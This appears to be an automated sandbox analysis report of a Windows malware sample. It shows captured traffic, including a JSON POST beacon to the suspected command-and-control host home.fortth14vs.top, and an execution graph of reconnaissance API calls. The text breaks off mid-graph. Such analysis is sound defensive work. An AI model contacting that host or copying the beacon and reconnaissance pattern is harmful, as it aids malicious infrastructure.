                                  TimestampBytes transferredDirectionData
                                  Dec 31, 2024 09:51:06.607353926 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                  Host: home.fortth14vs.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                  Data Ascii: { "id1": "0", "data": "Done1" }
                                  Dec 31, 2024 09:51:07.422214031 CET372INHTTP/1.1 404 NOT FOUND
                                  Server: nginx/1.22.1
                                  Date: Tue, 31 Dec 2024 08:51:07 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 207
                                  Connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.84970434.200.57.1144435572C:\Users\user\Desktop\r8nllkNEQX.exe
                                  TimestampBytes transferredDirectionData
                                  2024-12-31 08:50:59 UTC52OUTGET /ip HTTP/1.1
                                  Host: httpbin.org
                                  Accept: */*
                                  2024-12-31 08:50:59 UTC224INHTTP/1.1 200 OK
                                  Date: Tue, 31 Dec 2024 08:50:59 GMT
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Connection: close
                                  Server: gunicorn/19.9.0
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Credentials: true
                                  2024-12-31 08:50:59 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                  Data Ascii: { "origin": "8.46.123.189"}


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:03:50:56
                                  Start date:31/12/2024
                                  Path:C:\Users\user\Desktop\r8nllkNEQX.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\r8nllkNEQX.exe"
                                  Imagebase:0x2d0000
                                  File size:4'509'696 bytes
                                  MD5 hash:5D07283413428B07167FBCDBB4063558
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:2.9%
                                    Dynamic/Decrypted Code Coverage:18%
                                    Signature Coverage:11.3%
                                    Total number of Nodes:715
                                    Total number of Limit Nodes:107
                                    execution_graph 88475 3095b0 88476 3095c8 88475->88476 88477 3095fd 88475->88477 88476->88477 88479 30a150 88476->88479 88480 30a15f 88479->88480 88489 30a246 88479->88489 88481 30a181 getsockname 88480->88481 88480->88489 88482 30a1f7 88481->88482 88484 30a1d0 88481->88484 88492 30ef30 88482->88492 88491 2ed090 _open 88484->88491 88486 30a1eb 88502 314f40 _open 88486->88502 88489->88477 88491->88486 88493 30ef47 88492->88493 88494 30efa8 88492->88494 88495 30ef81 88493->88495 88496 30ef4c 88493->88496 88500 30a20f 88494->88500 88505 2dc960 _open 88494->88505 88504 333d10 _open 88495->88504 88496->88500 88503 333d10 _open 88496->88503 88500->88489 88501 2ed090 _open 88500->88501 88501->88486 88502->88489 88503->88500 88504->88500 88505->88500 88506 306ab0 88507 306ad5 88506->88507 88508 306bb4 88507->88508 88515 2e6fa0 88507->88515 88509 385ed0 9 API calls 88508->88509 88511 306ba9 88509->88511 88513 306b5d 88513->88511 88523 385ed0 88513->88523 88516 2e6feb 88515->88516 88517 2e6fd4 88515->88517 88516->88508 88516->88511 88516->88513 88517->88516 88518 2e7207 select 88517->88518 88518->88516 88522 2e7233 88518->88522 88519 2e726b __WSAFDIsSet 88520 2e729a __WSAFDIsSet 88519->88520 88519->88522 88521 2e72ba __WSAFDIsSet 88520->88521 88520->88522 88521->88522 88522->88516 88522->88519 88522->88520 88522->88521 88526 385a50 88523->88526 88525 385ee5 88525->88513 88527 385a58 88526->88527 88532 385ea0 88526->88532 88528 385b50 88527->88528 88531 385b88 88527->88531 88541 385a99 88527->88541 88528->88531 88533 385b7a 88528->88533 88534 385eb4 88528->88534 88529 385e96 88561 399480 socket ioctlsocket connect getsockname closesocket 88529->88561 88539 385cae 88531->88539 88559 385ef0 socket ioctlsocket connect getsockname 88531->88559 88532->88525 88551 3870a0 88533->88551 88562 386f10 socket ioctlsocket connect getsockname closesocket 88534->88562 88538 385ec2 88538->88538 88539->88529 88542 385da1 __WSAFDIsSet 88539->88542 88547 39a920 88539->88547 88560 399320 socket ioctlsocket connect getsockname closesocket 88539->88560 88540 385be2 __WSAFDIsSet 88540->88541 88541->88531 88541->88540 88544 3870a0 6 API calls 88541->88544 88558 386f10 socket ioctlsocket connect getsockname closesocket 88541->88558 88542->88539 88544->88541 88548 39a944 88547->88548 88549 39a94b 88548->88549 88550 39a977 send 88548->88550 88549->88539 88550->88539 88552 3870ae 88551->88552 88554 38717f 88552->88554 88556 3871a7 88552->88556 88563 39a8c0 88552->88563 88567 3871c0 socket ioctlsocket connect getsockname 88552->88567 88554->88556 88568 399320 socket ioctlsocket connect getsockname closesocket 88554->88568 88556->88531 88558->88541 88559->88531 88560->88539 88561->88532 88562->88538 88564 39a903 recvfrom 88563->88564 88565 39a8e6 88563->88565 88566 39a8ed 88564->88566 88565->88564 88565->88566 88566->88552 88567->88552 88568->88556 88799 308b50 88800 308b6b 88799->88800 88828 308be6 88799->88828 88801 308bf3 88800->88801 88802 308b8f 88800->88802 88800->88828 88832 30a550 88801->88832 88891 2e6e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 88802->88891 88806 308cd9 SleepEx 88818 308d14 88806->88818 88807 308e85 88812 308eae 88807->88812 88807->88828 88897 2e2a00 _open 88807->88897 88808 30a150 2 API calls 88820 308dff 88808->88820 88809 308c35 88815 30a150 2 API calls 88809->88815 88810 308c1f connect 88810->88809 88811 308cb2 88811->88807 88811->88808 88811->88828 88812->88828 88898 2d78b0 closesocket 88812->88898 88829 308c4d 88815->88829 88816 308bb5 88816->88828 88893 3150a0 _open 88816->88893 88817 308d43 88822 30a150 2 API calls 88817->88822 88818->88811 88818->88817 88819 308c8b 88824 308dc8 88819->88824 88825 308ba1 88819->88825 88820->88807 88895 2ed090 _open 88820->88895 88822->88816 88894 30b100 _open 88824->88894 88825->88806 88825->88811 88825->88816 88826 308e67 88896 314fd0 _open 88826->88896 88829->88819 88892 3150a0 _open 88829->88892 88833 30a575 88832->88833 88835 30a597 88833->88835 88902 2d75e0 88833->88902 88836 30ef30 _open 88835->88836 88838 30a6d9 88835->88838 88840 30a63a 88836->88840 88837 30a709 88841 2d78b0 2 API calls 88837->88841 88843 30a713 88837->88843 88838->88837 88838->88843 88917 2e2a00 _open 88838->88917 88842 30a641 88840->88842 88845 30a69b 88840->88845 88841->88843 88849 30a7e5 88842->88849 88919 314fd0 _open 88842->88919 88846 308bfc 88843->88846 88918 3150a0 _open 88843->88918 88915 2ed090 _open 88845->88915 88846->88809 88846->88810 88846->88811 88846->88828 88848 30a811 setsockopt 88851 30a87c 88848->88851 88856 30a83b 88848->88856 88849->88848 88849->88851 88863 30a8ee 88849->88863 88851->88863 88922 30b1e0 _open 88851->88922 88852 30a6c9 88916 314f40 _open 88852->88916 88856->88851 88920 2ed090 _open 88856->88920 88857 30af56 88857->88838 88859 30af5d 88857->88859 88859->88843 88862 30a150 2 API calls 88859->88862 88860 30a86d 88921 314fd0 _open 88860->88921 88862->88843 88863->88838 88864 30ae32 88863->88864 88865 30acb8 88863->88865 88867 30abb9 88863->88867 88873 30af33 88863->88873 88883 30abe1 88863->88883 88864->88867 88930 314fd0 _open 88864->88930 88865->88838 88865->88867 88874 30acdc 88865->88874 88866 30b056 88933 2ed090 _open 88866->88933 88870 30ad45 88867->88870 88871 30ade6 88867->88871 88867->88883 88924 306be0 14 API calls 88867->88924 88868 30af03 88868->88873 88931 314fd0 _open 88868->88931 88870->88871 88872 30ad5f 88870->88872 88928 2ed090 _open 88871->88928 88925 3220d0 _open 88872->88925 88914 3367e0 ioctlsocket 88873->88914 88923 2ed090 _open 88874->88923 88880 30b07b 88934 314f40 _open 88880->88934 88881 30ad7b 88884 30adb7 88881->88884 88926 314fd0 _open 88881->88926 88883->88838 88883->88866 88883->88868 88932 314fd0 _open 88883->88932 88927 323030 _open 88884->88927 88887 30ad01 88929 314f40 _open 88887->88929 88891->88825 88892->88819 88893->88828 88894->88811 88895->88826 88896->88807 88897->88812 88899 2d78d7 88898->88899 88900 2d78c5 88898->88900 88899->88828 88938 2d72a0 _open 88900->88938 88903 2d75ef 88902->88903 88904 2d7607 socket 88902->88904 88903->88904 88907 2d7601 88903->88907 88908 2d7643 88903->88908 88905 2d763a 88904->88905 88906 2d762b 88904->88906 88905->88835 88935 2d72a0 _open 88906->88935 88907->88904 88936 2d72a0 _open 88908->88936 88911 2d7654 88937 2dcb20 _open 88911->88937 88913 2d7674 88913->88835 88914->88857 88915->88852 88916->88838 88917->88837 88918->88846 88919->88849 88920->88860 88921->88851 88922->88863 88923->88887 88924->88870 88925->88881 88926->88884 88927->88883 88928->88887 88929->88838 88930->88867 88931->88873 88932->88883 88933->88880 88934->88838 88935->88905 88936->88911 88937->88913 88938->88899 88939 7100532 88941 710052b 88939->88941 88942 71004c6 88939->88942 88940 71004b1 Process32NextW 88940->88942 88942->88940 88942->88941 88943 2d13c9 88945 2d1160 88943->88945 88947 2d13a1 88945->88947 88948 6593e0 88945->88948 88958 658a20 _open islower islower 88945->88958 88954 659400 88948->88954 88957 6593f3 88948->88957 88949 659688 88950 6596c7 88949->88950 88949->88957 88959 659280 vfprintf 88949->88959 88960 659220 vfprintf 88950->88960 88953 6596df 88953->88945 88954->88949 88954->88950 88955 659220 vfprintf 88954->88955 88956 659280 vfprintf 88954->88956 88954->88957 88955->88954 88956->88954 88957->88945 88958->88945 88959->88949 88960->88953 88569 79fa30 88570 79fa5a 88569->88570 88571 79fa66 88570->88571 88579 658f70 88570->88579 88576 79faa6 88577 658f70 _open 88578 79faaf 88577->88578 88590 658e90 _open 88579->88590 88581 658f82 88582 658e90 _open 88581->88582 88583 658fa2 88582->88583 88584 658f70 _open 88583->88584 88585 658fb8 88584->88585 88586 6612c0 88585->88586 88587 6612cc 88586->88587 88592 65e050 88587->88592 88589 6612fa 88589->88576 88589->88577 88591 658eba 88590->88591 88591->88581 88595 65e09d 88592->88595 88593 65e18e 88593->88589 88595->88593 88596 65b1a0 islower islower 88595->88596 88596->88595 88597 2ed5e0 88598 2ed652 WSAStartup 88597->88598 88599 2ed5f0 88597->88599 88598->88599 88600 2ed664 88598->88600 88602 2ed67c 88599->88602 88604 2ed690 _open 88599->88604 88603 2ed5fa 88604->88603 88961 30b400 88962 30b425 88961->88962 88963 30b40b 88961->88963 88966 2d7770 88963->88966 88964 30b421 88967 2d77b6 recv 88966->88967 88968 2d7790 88966->88968 88970 2d77a3 88967->88970 88976 2d77d4 88967->88976 88968->88967 88969 2d7799 88968->88969 88969->88970 88971 2d77db 88969->88971 88977 2d72a0 _open 88970->88977 88978 2d72a0 _open 88971->88978 88974 2d77ec 88979 2dcb20 _open 88974->88979 88976->88964 88977->88976 88978->88974 88979->88976 88980 30e400 88981 30e412 88980->88981 88983 30e459 88980->88983 88982 30e422 88981->88982 89004 323030 _open 88981->89004 89005 3309d0 _open 88982->89005 88988 30e4a8 88983->88988 88991 30e495 88983->88991 88992 30b5a0 88983->88992 88986 30e42b 89006 3068b0 6 API calls 88986->89006 88990 30b5a0 _open 88990->88988 88991->88988 88991->88990 88993 30b5c0 88992->88993 88996 30b5d2 88992->88996 88994 30b713 88993->88994 88993->88996 89000 30b626 88993->89000 89008 314f40 _open 88994->89008 88996->88991 88997 30b65a 88997->88996 88998 30b72b 88997->88998 88999 30b737 88997->88999 88998->88996 89009 3150a0 _open 88998->89009 88999->88996 89010 3150a0 _open 88999->89010 89000->88996 89000->88997 89000->88998 89000->88999 89007 3150a0 _open 89000->89007 89004->88982 89005->88986 89006->88983 89007->89000 89008->88996 89009->88996 89010->88996 89011 30f100 89013 30f11f 89011->89013 89038 30f1b8 89011->89038 89012 30ff1a 89061 310c80 _open 89012->89061 89015 30f2a3 89013->89015 89030 30f240 89013->89030 89034 30f603 89013->89034 89013->89038 89046 314f40 _open 89015->89046 89017 310045 89021 31010d 89017->89021 89024 31004d 89017->89024 89017->89038 89064 3150a0 _open 89017->89064 89018 30f80d 89019 3150a0 _open 89019->89034 89022 31015e 89021->89022 89065 3150a0 _open 89021->89065 89022->89024 89066 3150a0 _open 89022->89066 89023 31008a 89063 314f40 _open 89023->89063 89067 314f40 _open 89024->89067 89030->89038 89047 2d7310 89030->89047 89032 30f491 89032->89034 89037 2d7310 _open 89032->89037 89034->89012 89034->89017 89034->89018 89034->89019 89034->89023 89039 310d30 _open 89034->89039 89059 2dfa50 _open 89034->89059 89060 314fd0 _open 89034->89060 89035 30ff5b 89035->89038 89062 3150a0 _open 89035->89062 89044 30f50d 89037->89044 89039->89034 89040 30f3ce 89040->89032 89040->89038 89056 3150a0 _open 89040->89056 89042 30f5b9 89058 2dfa50 _open 89042->89058 89044->89038 89044->89042 89057 3150a0 _open 89044->89057 89046->89038 89048 2d7320 89047->89048 89051 2d7332 89047->89051 89049 2d7390 89048->89049 89048->89051 89069 2d72a0 _open 89049->89069 89055 2d7380 89051->89055 89068 2d72a0 _open 89051->89068 89053 2d73a1 89070 2dcb20 _open 89053->89070 89055->89040 89056->89032 89057->89042 89058->89034 89059->89034 89060->89034 89061->89035 89062->89038 89063->89038 89064->89021 89065->89022 89066->89024 89067->89038 89068->89055 89069->89053 89070->89055 89071 2d255d 89112 659f70 89071->89112 89074 2d2589 89075 2d25a0 GlobalMemoryStatusEx 89074->89075 89076 2d25ec 89075->89076 89077 2d261b 89076->89077 89114 70a0c88 89076->89114 89118 70a0ac8 89076->89118 89124 70a0b92 89076->89124 89128 70a0970 89076->89128 89136 70a0bb7 89076->89136 89140 70a0b33 89076->89140 89144 70a0ab3 89076->89144 89150 70a0cff 89076->89150 89154 70a0a32 89076->89154 89160 70a0c27 89076->89160 89164 70a0afb 89076->89164 89168 70a0b63 89076->89168 89172 70a09e6 89076->89172 89180 70a0a16 89076->89180 89186 70a0a57 89076->89186 89192 70a0a00 89076->89192 89200 70a0b53 89076->89200 89204 70a0bd9 89076->89204 89208 70a099d 89076->89208 89217 70a09da 89076->89217 89225 70a0a9b 89076->89225 89231 70a0983 89076->89231 89239 70a09c1 89076->89239 89247 70a0b43 89076->89247 89251 70a0a8c 89076->89251 89257 70a0c4f 89076->89257 89078 2d263c GetDriveTypeA 89077->89078 89079 2d2762 89077->89079 89078->89077 89080 2d2655 GetDiskFreeSpaceExA 89078->89080 89081 2d27d6 KiUserCallbackDispatcher 89079->89081 89080->89077 89082 2d27f8 89081->89082 89083 2d28d9 FindFirstFileW 89082->89083 89084 2d2906 FindNextFileW 89083->89084 89085 2d2928 89083->89085 89084->89084 89084->89085 89113 2d256c GetSystemInfo 89112->89113 89113->89074 89115 70a0ca2 GetLogicalDrives 89114->89115 89117 70a0ccd 89115->89117 89117->89077 89119 70a0a90 89118->89119 89120 70a0afb GetLogicalDrives 89119->89120 89121 70a0af0 GetLogicalDrives 89120->89121 89123 70a0ccd 89121->89123 89123->89077 89125 70a0b99 GetLogicalDrives 89124->89125 89127 70a0ccd 89125->89127 89127->89077 89129 70a0994 89128->89129 89130 70a0a32 2 API calls 89129->89130 89131 70a0a1f 89130->89131 89132 70a0afb GetLogicalDrives 89131->89132 89133 70a0af0 GetLogicalDrives 89132->89133 89135 70a0ccd 89133->89135 89135->89077 89137 70a0b64 GetLogicalDrives 89136->89137 89139 70a0ccd 89137->89139 89139->89077 89141 70a0b49 GetLogicalDrives 89140->89141 89143 70a0ccd 89141->89143 89143->89077 89145 70a0ad5 89144->89145 89146 70a0afb GetLogicalDrives 89145->89146 89147 70a0af0 GetLogicalDrives 89146->89147 89149 70a0ccd 89147->89149 89149->89077 89151 70a0c9d GetLogicalDrives 89150->89151 89153 70a0ccd 89150->89153 89151->89153 89153->89077 89155 70a0a44 89154->89155 89156 70a0afb GetLogicalDrives 89155->89156 89157 70a0af0 GetLogicalDrives 89156->89157 89159 70a0ccd 89157->89159 89159->89077 89161 70a0c33 GetLogicalDrives 89160->89161 89163 70a0ccd 89161->89163 89163->89077 89165 70a0b25 GetLogicalDrives 89164->89165 89167 70a0ccd 89165->89167 89167->89077 89169 70a0b64 GetLogicalDrives 89168->89169 89171 70a0ccd 89169->89171 89171->89077 89173 70a09d4 89172->89173 89174 70a0a32 2 API calls 89173->89174 89175 70a0a1f 89174->89175 89176 70a0afb GetLogicalDrives 89175->89176 89177 70a0af0 GetLogicalDrives 89176->89177 89179 70a0ccd 89177->89179 89179->89077 89181 70a0a26 89180->89181 89182 70a0afb GetLogicalDrives 89181->89182 89183 70a0af0 GetLogicalDrives 89182->89183 89185 70a0ccd 89183->89185 89185->89077 89187 70a0a85 89186->89187 89188 70a0afb GetLogicalDrives 89187->89188 89189 70a0af0 GetLogicalDrives 89188->89189 89191 70a0ccd 89189->89191 89191->89077 89193 70a0a03 89192->89193 89195 70a0a1f 89192->89195 89194 70a0a32 2 API calls 89193->89194 89194->89195 89196 70a0afb GetLogicalDrives 89195->89196 89197 70a0af0 GetLogicalDrives 89196->89197 89199 70a0ccd 89197->89199 89199->89077 89201 70a0b5a GetLogicalDrives 89200->89201 89203 70a0ccd 89201->89203 89203->89077 89205 70a0b64 GetLogicalDrives 89204->89205 89207 70a0ccd 89205->89207 89207->89077 89209 70a0966 89208->89209 89210 70a09a3 89208->89210 89211 70a0a32 2 API calls 89210->89211 89212 70a0a1f 89211->89212 89213 70a0afb GetLogicalDrives 89212->89213 89214 70a0af0 GetLogicalDrives 89213->89214 89216 70a0ccd 89214->89216 89216->89077 89218 70a09e0 89217->89218 89219 70a0a32 2 API calls 89218->89219 89220 70a0a1f 89219->89220 89221 70a0afb GetLogicalDrives 89220->89221 89222 70a0af0 GetLogicalDrives 89221->89222 89224 70a0ccd 89222->89224 89224->89077 89226 70a0a3d 89225->89226 89227 70a0afb GetLogicalDrives 89226->89227 89228 70a0af0 GetLogicalDrives 89227->89228 89230 70a0ccd 89228->89230 89230->89077 89232 70a0994 89231->89232 89233 70a0a32 2 API calls 89232->89233 89234 70a0a1f 89233->89234 89235 70a0afb GetLogicalDrives 89234->89235 89236 70a0af0 GetLogicalDrives 89235->89236 89238 70a0ccd 89236->89238 89238->89077 89240 70a09d4 89239->89240 89241 70a0a32 2 API calls 89240->89241 89242 70a0a1f 89241->89242 89243 70a0afb GetLogicalDrives 89242->89243 89244 70a0af0 GetLogicalDrives 89243->89244 89246 70a0ccd 89244->89246 89246->89077 89248 70a0b49 GetLogicalDrives 89247->89248 89250 70a0ccd 89248->89250 89250->89077 89252 70a0aa8 89251->89252 89253 70a0afb GetLogicalDrives 89252->89253 89254 70a0af0 GetLogicalDrives 89253->89254 89256 70a0ccd 89254->89256 89256->89077 89258 70a0c8d GetLogicalDrives 89257->89258 89260 70a0ccd 89258->89260 89260->89077 89261 30b3c0 89262 30b3cb 89261->89262 89263 30b3ee 89261->89263 89267 309290 89262->89267 89281 2d76a0 89262->89281 89264 30b3ea 89268 2d76a0 2 API calls 89267->89268 89269 3092e5 89268->89269 89270 3093c3 89269->89270 89271 3092f3 89269->89271 89273 309392 89270->89273 89292 2ed090 _open 89270->89292 89271->89273 89276 309335 WSAIoctl 89271->89276 89278 3093be 89273->89278 89294 3150a0 _open 89273->89294 89274 3093f7 89293 314f40 _open 89274->89293 89276->89273 89279 309366 89276->89279 89278->89264 89279->89273 89280 309371 setsockopt 89279->89280 89280->89273 89282 2d76e6 send 89281->89282 89283 2d76c0 89281->89283 89285 2d7704 89282->89285 89286 2d76d3 89282->89286 89283->89282 89284 2d76c9 89283->89284 89284->89286 89287 2d770b 89284->89287 89285->89264 89295 2d72a0 _open 89286->89295 89296 2d72a0 _open 89287->89296 89290 2d771c 89297 2dcb20 _open 89290->89297 89292->89274 89293->89273 89294->89278 89295->89285 89296->89290 89297->89285 88605 70f045e 88606 70f0469 88605->88606 88607 70f0406 Process32FirstW 88605->88607 88606->88607 88608 70f0436 88606->88608 88607->88608 89298 310700 89306 310719 89298->89306 89313 31099d 89298->89313 89300 2d7310 _open 89300->89306 89302 3109f6 89310 2d75a0 _open 89302->89310 89303 3109b5 89303->89313 89322 3150a0 _open 89303->89322 89305 310a35 89323 314f40 _open 89305->89323 89306->89300 89306->89302 89306->89303 89306->89305 89306->89313 89316 30b8e0 _open 89306->89316 89317 33f570 _open 89306->89317 89318 2feb30 _open 89306->89318 89319 3313a0 _open 89306->89319 89320 3539a0 _open 89306->89320 89321 2feae0 _open 89306->89321 89312 310a11 89310->89312 89314 2d75a0 _open 89312->89314 89314->89313 89316->89306 89317->89306 89318->89306 89319->89306 89320->89306 89321->89306 89322->89313 89323->89313 88609 2d29ff FindFirstFileA 88610 2d2a31 88609->88610 88611 2d2a5c RegOpenKeyExA 88610->88611 88612 2d2a93 88611->88612 88613 2d2ade CharUpperA 88612->88613 88615 2d2b0a 88613->88615 88614 2d2bf9 QueryFullProcessImageNameA 88616 2d2c3b CloseHandle 88614->88616 88615->88614 88618 2d2c64 88616->88618 88617 2d2df1 CloseHandle 88619 2d2e23 88617->88619 88618->88617 89324 2d3d5e 89325 2d3d30 89324->89325 89325->89324 89326 2d3d90 89325->89326 89330 2e0ab0 89325->89330 89333 2dfcb0 11 API calls 89326->89333 89329 2d3dc1 89334 2e05b0 89330->89334 89333->89329 89335 2e07c7 89334->89335 89343 2e05bd 89334->89343 89335->89325 89336 2e066a 89353 30dec0 89336->89353 89340 2e067b 89347 2e06f0 89340->89347 89349 2e07ce 89340->89349 89360 2e73b0 _open 89340->89360 89343->89335 89343->89336 89343->89349 89358 2e03c0 _open 89343->89358 89359 2e7450 _open 89343->89359 89344 2e0707 WSAEventSelect 89344->89347 89344->89349 89345 2e07ef 89346 2e6fa0 4 API calls 89345->89346 89345->89349 89351 2e0847 89345->89351 89346->89351 89347->89344 89347->89345 89348 2d76a0 2 API calls 89347->89348 89348->89347 89361 2e7380 _open 89349->89361 89350 2e09e8 WSAEnumNetworkEvents 89350->89351 89352 2e09d0 WSAEventSelect 89350->89352 89351->89349 89351->89350 89351->89352 89352->89350 89352->89351 89354 30df1e 89353->89354 89355 30dece 89353->89355 89356 30df30 _open 89355->89356 89357 30def9 89356->89357 89357->89340 89358->89343 89359->89343 89360->89340 89361->89335 88620 2e1139 88645 30baa0 88620->88645 88622 2e1148 88623 2e1512 88622->88623 88628 2e1161 88622->88628 88632 2e1527 88623->88632 88653 2dfec0 11 API calls 88623->88653 88625 2e0f69 88626 2e1f58 88625->88626 88627 2e1fb0 88625->88627 88634 2e0f00 88625->88634 88629 2e0150 _open 88626->88629 88627->88634 88656 2e4940 _open 88627->88656 88628->88625 88630 2e0150 _open 88628->88630 88640 2e1f61 88629->88640 88630->88625 88632->88625 88654 2e22d0 11 API calls 88632->88654 88641 2e0f21 88634->88641 88649 2e0150 88634->88649 88635 2e1fa6 88635->88634 88637 2e208a 88635->88637 88635->88641 88657 2d75a0 88635->88657 88661 2e3900 _open 88637->88661 88640->88635 88655 30d4d0 6 API calls 88640->88655 88644 2d75a0 _open 88644->88637 88646 30bb60 88645->88646 88648 30bac7 88645->88648 88646->88622 88648->88646 88662 2f05b0 _open 88648->88662 88650 2e0167 88649->88650 88652 2e01c3 88650->88652 88663 2e30d0 _open 88650->88663 88652->88641 88653->88632 88654->88625 88655->88635 88656->88635 88658 2d75aa 88657->88658 88659 2d75d1 88657->88659 88658->88659 88664 2d72a0 _open 88658->88664 88659->88644 88661->88634 88662->88646 88663->88652 88664->88659 88665 384720 88669 384728 88665->88669 88666 384733 88668 384774 88669->88666 88676 38476c 88669->88676 88677 385540 socket ioctlsocket connect getsockname closesocket 88669->88677 88671 38482e 88671->88676 88678 389270 88671->88678 88673 384860 88683 384950 88673->88683 88675 384878 88676->88675 88691 3830a0 socket ioctlsocket connect getsockname closesocket 88676->88691 88677->88671 88692 38a440 88678->88692 88680 389297 88682 3892ab 88680->88682 88725 38bbe0 socket ioctlsocket connect getsockname closesocket 88680->88725 88682->88673 88684 384966 88683->88684 88688 3849c5 88684->88688 88690 3849b9 88684->88690 88727 38b590 if_nametoindex if_indextoname 88684->88727 88686 384a3e 88686->88688 88728 38bbe0 socket ioctlsocket connect getsockname closesocket 88686->88728 88687 384aa0 gethostname 88687->88688 88687->88690 88688->88676 88690->88687 88690->88688 88691->88668 88722 38a46b 88692->88722 88693 38a4db 88694 38aa03 RegOpenKeyExA 88693->88694 88706 38ad14 88693->88706 88695 38ab70 RegOpenKeyExA 88694->88695 88696 38aa27 RegQueryValueExA 88694->88696 88699 38ac34 RegOpenKeyExA 88695->88699 88717 38ab90 88695->88717 88697 38aacc RegQueryValueExA 88696->88697 88698 38aa71 88696->88698 88701 38ab0e 88697->88701 88702 38ab66 RegCloseKey 88697->88702 88698->88697 88705 38aa85 RegQueryValueExA 88698->88705 88700 38acf8 RegOpenKeyExA 88699->88700 88720 38ac54 88699->88720 88703 38ad56 RegEnumKeyExA 88700->88703 88700->88706 88701->88702 88709 38ab1e RegQueryValueExA 88701->88709 88702->88695 88704 38ad9b 88703->88704 88703->88706 88707 38ae16 RegOpenKeyExA 88704->88707 88708 38aab3 88705->88708 88706->88680 88710 38addf RegEnumKeyExA 88707->88710 88711 38ae34 RegQueryValueExA 88707->88711 88708->88697 88712 38ab4c 88709->88712 88710->88706 88710->88707 88713 38af43 RegQueryValueExA 88711->88713 88724 38adaa 88711->88724 88712->88702 88714 38b052 RegQueryValueExA 88713->88714 88713->88724 88716 38adc7 RegCloseKey 88714->88716 88714->88724 88716->88710 88717->88699 88718 38a794 GetBestRoute2 88718->88722 88719 38afa0 RegQueryValueExA 88719->88724 88720->88700 88721 38a6c7 GetBestRoute2 88721->88722 88722->88693 88722->88718 88722->88721 88723 38a520 88722->88723 88723->88693 88726 38b830 if_nametoindex if_indextoname 88723->88726 88724->88713 88724->88714 88724->88716 88724->88719 88725->88682 88726->88693 88727->88686 88728->88690 89362 383c00 89363 383c23 89362->89363 89365 383c0d 89362->89365 89363->89365 89366 39b180 89363->89366 89367 39b2e3 89366->89367 89368 39b19b 89366->89368 89367->89365 89368->89367 89371 39b2a9 getsockname 89368->89371 89373 39b020 closesocket 89368->89373 89374 39af30 89368->89374 89378 39b060 89368->89378 89383 39b020 89371->89383 89373->89368 89375 39af4c 89374->89375 89376 39af63 socket 89374->89376 89375->89376 89377 39af52 89375->89377 89376->89368 89377->89368 89382 39b080 89378->89382 89379 39b0b0 connect 89380 39b0bf WSAGetLastError 89379->89380 89381 39b0ea 89380->89381 89380->89382 89381->89368 89382->89379 89382->89380 89382->89381 89384 39b029 89383->89384 89385 39b052 89383->89385 89386 39b04b closesocket 89384->89386 89387 39b03e 89384->89387 89385->89368 89386->89385 89387->89368 89388 39a080 89391 399740 89388->89391 89390 39a09b 89392 399780 89391->89392 89396 39975d 89391->89396 89393 399925 RegOpenKeyExA 89392->89393 89392->89396 89394 39995a RegQueryValueExA 89393->89394 89393->89396 89395 399986 RegCloseKey 89394->89395 89395->89396 89396->89390 88729 7a7460 88730 7a7492 88729->88730 88731 7a749e 88730->88731 88732 658f70 _open 88730->88732 88733 7a74a7 88732->88733 89397 2d2f17 89405 2d2f2c 89397->89405 89398 2d31d3 89399 2d2fb3 RegOpenKeyExA 89399->89405 89400 2d315c RegEnumKeyExA 89401 2d31b2 RegCloseKey 89400->89401 89400->89405 89401->89405 89402 2d3046 RegOpenKeyExA 89403 2d3089 RegQueryValueExA 89402->89403 89402->89405 89404 2d313b RegCloseKey 89403->89404 89403->89405 89404->89405 89405->89398 89405->89399 89405->89400 89405->89402 89405->89404 89406 2d31d7 89409 2d31f4 89406->89409 89407 2d3200 89408 2d32dc CloseHandle 89408->89407 89409->89407 89409->89408 88734 2df7b0 88736 2df7c3 88734->88736 88756 2df97a 88734->88756 88735 2e0150 _open 88743 2df854 88735->88743 88736->88735 88736->88756 88737 2df932 88757 30cd80 88737->88757 88739 2df942 88740 2df987 88739->88740 88742 321390 _open 88739->88742 88778 321390 88740->88778 88742->88739 88743->88737 88743->88756 88782 2dfec0 11 API calls 88743->88782 88746 321390 _open 88747 2df9a0 88746->88747 88748 321390 _open 88747->88748 88749 2df9ac 88748->88749 88750 2df9bb WSACloseEvent 88749->88750 88751 2d75a0 